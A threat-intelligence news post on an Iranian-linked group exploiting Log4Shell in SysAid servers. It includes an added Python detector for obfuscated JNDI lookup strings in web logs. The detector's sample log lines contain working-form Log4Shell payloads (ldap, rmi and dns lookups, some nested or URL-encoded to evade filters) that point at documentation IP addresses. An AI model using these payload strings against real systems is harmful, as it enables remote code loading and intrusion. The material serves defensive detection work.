MERCURY (also tracked as MuddyWater), an APT group that Microsoft assesses to be Iranian state-sponsored, is exploiting the Log4Shell vulnerability (CVE-2021-44228) in unpatched SysAid applications to gain initial access to targeted organizations.

The attack

Researchers from Microsoft reported that the MERCURY group is exploiting the Log4Shell flaw in vulnerable SysAid applications used by Israeli organizations.
  • The group used Log4j 2 exploits against VMware applications earlier in 2022 and has now abused the same flaw in SysAid applications, which embed the vulnerable Log4j 2 library.
  • The attackers used several techniques to communicate with their command-and-control (C2) server, including PowerShell.
  • Further, a tunneling tool named vpnui.exe (a unique build of the open-source tool Ligolo) and the remote monitoring and management software eHorus were used in the attacks.
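A detection angle a practitioner would want here is how to spot the Log4Shell lookup strings in web access logs, because attackers rarely send the literal `${jndi:` token and instead nest Log4j 2 `lower`, `upper` and `:-` default-value lookups around it. The script below is an added example, not code from the original report or from Microsoft or SysAid; it URL-decodes each line, peels the nested lookups from the inside out until the string stops changing, and only then matches the JNDI lookup. The access-log lines, hosts and IP addresses are constructed for illustration (RFC 5737 documentation ranges), and the log format is a generic combined-style format rather than SysAid's actual one.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup strings in web access logs,
including the case/default-value lookup obfuscations attackers nest to
evade naive "${jndi:" string matching. Added, constructed example: the
sample log lines below are made up and are not from any real deployment."""
import re
import urllib.parse

# Log4j 2 lookups that attackers nest to hide the literal "jndi" token:
#   ${lower:J} -> J      ${upper:n} -> n   (case is folded at the end)
#   ${::-d}    -> d      ${env:NOPE:-i} -> i  (":-" default-value syntax)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# Protocols JNDI can dereference; ldap and rmi allow remote class loading.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):")


def normalize(text: str, max_rounds: int = 16) -> str:
    """URL-decode, then resolve nested lookups inside-out until stable."""
    s = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s.lower()


def find_jndi(text: str):
    """Return the JNDI protocol (e.g. 'ldap') if a lookup is present, else None."""
    m = _JNDI.search(normalize(text))
    return m.group(1) if m else None


def scan_log(lines):
    """Return a list of (line_number, protocol, normalized_line) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        proto = find_jndi(line)
        if proto:
            hits.append((n, proto, normalize(line)))
    return hits


# Constructed access-log lines (illustrative only). 198.51.100.0/24 and
# 203.0.113.0/24 are RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Jul/2022:08:01:14 +0000] "GET /Login.jsp HTTP/1.1" 200 512 "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jul/2022:08:01:15 +0000] "GET /Login.jsp HTTP/1.1" 200 512 "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [10/Jul/2022:08:01:16 +0000] "POST /api/v1/users HTTP/1.1" 200 88 "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:rmi://203.0.113.7:1099/x}"',
    '203.0.113.7 - - [10/Jul/2022:08:01:17 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fx.203.0.113.7%7D HTTP/1.1" 200 12 "curl/7.8"',
    '198.51.100.21 - - [10/Jul/2022:08:02:00 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, proto, norm in scan_log(SAMPLE_LOG):
        print(f"line {n}: jndi:{proto} lookup -> {norm}")
```

Run as-is it flags lines 2, 3 and 4 of the sample (ldap, rmi and dns lookups respectively) and leaves the benign `${version}` line alone. The iterative normalization is the point: a single-pass regex misses `${${lower:j}${upper:n}${::-d}...}`, and the `dns:` hit matters because attackers use it to confirm a target is vulnerable before sending an `ldap:` payload that loads a remote class.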

Post-infection tactics

  • After gaining a foothold in the target network, the attackers establish persistence, dump credentials, and move laterally within the organization using Windows Management Instrumentation (WMI) and remote services, with the RemCom tool used to run commands on remote hosts.
  • The group used both custom hacking tools and built-in operating system tools for hands-on-keyboard activity.

Although SysAid patched the Log4Shell flaw shortly after its disclosure, several organizations have still not applied the update, which is what keeps this attack path open.

Conclusion

All the SysAid applications targeted by the MERCURY APT group belonged to Israeli organizations. Moreover, the range of tools in use indicates that the group possesses a wide set of skills and resources. Organizations in that region and elsewhere are therefore advised to apply the SysAid update and follow the mitigation and hunting recommendations provided by Microsoft.
Cyware Publisher
